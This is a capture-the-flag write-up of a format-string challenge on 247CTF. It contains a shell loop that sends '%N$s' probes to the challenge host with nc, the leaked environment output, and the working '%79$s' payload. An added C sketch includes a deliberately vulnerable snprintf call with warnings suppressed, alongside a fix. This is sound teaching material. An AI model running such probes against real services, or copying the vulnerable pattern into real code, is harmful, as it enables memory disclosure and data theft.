This is my write-up of the Pwnable challenge "Confused Environment Read" on the CTF site 247CTF.com.
Can you abuse our confused environment service to read flag data hidden on the stack?
kali@kali:~$ for i in $(seq 0 100); do echo "%$i\$s" | nc b7dca240cf1fbf61.247ctf.com 50478; done
Keep interrupting each connection with ^C until you hit something interesting on the stack:
/home/notroot/chall
HOSTNAME=b7dca240cf1f!
HOME=/home/notroot
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin!
PWD=/home/notroot!
FLAG=247CTF{FLAG}!
The exact offset that returns the flag is 79:
kali@kali:~$ nc b7dca240cf1fbf61.247ctf.com 50478
Argh, I can't see who you are!
What's your name again?
%79$s
Oh, that's right! Welcome back FLAG=247CTF{FLAG}!
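
Why `%79$s` echoes an environment string, shown as an added example that is not part of the original write-up or the challenge's code. The challenge source is not shown, so this C sketch assumes the service passes the name to a printf-family function as the format string; `greet_vulnerable` and `greet_fixed` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Assumed shape of the bug: the name is used as the format string, so
 * "%79$s" makes printf fetch its 79th argument slot (a stack word) and
 * print the string it points to, here a pointer to an environment string.
 * gcc and clang report the marked line under -Wformat-security; the
 * pragmas silence that only so this demo also builds with -Werror. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int greet_vulnerable(char *out, size_t n, const char *name)
{
    size_t off = 0;
    int r = snprintf(out, n, "Oh, that's right! Welcome back ");
    if (r < 0 || (size_t)r >= n) return -1;
    off += (size_t)r;
    r = snprintf(out + off, n - off, name);   /* BUG: input is the format */
    if (r < 0 || (size_t)r >= n - off) return -1;
    off += (size_t)r;
    r = snprintf(out + off, n - off, "!");
    if (r < 0 || (size_t)r >= n - off) return -1;
    return (int)(off + (size_t)r);
}
#pragma GCC diagnostic pop

/* Fix: the format is a constant and the name is only ever data for %s,
 * so conversion specifiers in the input are copied out verbatim. */
int greet_fixed(char *out, size_t n, const char *name)
{
    int r = snprintf(out, n, "Oh, that's right! Welcome back %s!", name);
    return (r < 0 || (size_t)r >= n) ? -1 : r;
}

int main(void)
{
    char buf[128];
    /* Only the fixed version receives the probe from the write-up;
     * passing it to greet_vulnerable is undefined behaviour. */
    if (greet_fixed(buf, sizeof buf, "%79$s") > 0)
        puts(buf);
    return 0;
}
```

Building with `-Werror=format-security` (and without the pragmas) turns the vulnerable call into a compile error.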